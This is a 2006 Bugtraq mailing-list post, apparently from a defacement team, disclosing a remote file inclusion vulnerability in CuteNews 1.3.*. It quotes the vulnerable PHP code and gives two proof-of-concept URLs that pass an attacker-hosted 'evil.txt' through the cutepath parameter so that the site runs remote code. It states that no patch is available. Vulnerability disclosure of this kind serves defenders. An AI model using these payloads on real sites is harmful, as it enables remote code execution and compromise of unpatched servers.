[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20060825191446.27787.qmail@securityfocus.com>
Date: 25 Aug 2006 19:14:46 -0000
From: stormhacker@...mail.com
To: bugtraq@...urityfocus.com
Subject: CuteNews 1.3.* Remote File Include Vulnerability
Welcome people In World Defacers Team
[W]orld [D]efacers Team
======================================
--------------------Summary----------------
eVuln ID: WD22
Vendor: CuteNews 1.3.*
Vendor's Web Site: http://cutephp.com/
Software: Live Customer Support Solution :- http://www.pansionat.net/novost/
Class: Remote
PoC/Exploit: Available
Solution: Not Available
Discovered by: rUnViRuS (worlddefacers.de)
-----------------Description---------------
$cutepath = __FILE__;
$cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
$cutepath = preg_replace( "'/search\.php'", "", $cutepath);
require_once("$cutepath/inc/functions.inc.php");
--------------PoC/Exploit----------------------
show_news.php?cutepath=http://host/evil.txt?
search.php?cutepath=http://host/evil.txt?
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Discovered by: rUnViRuS (worlddefacers.de)
Powered by blists - more mailing lists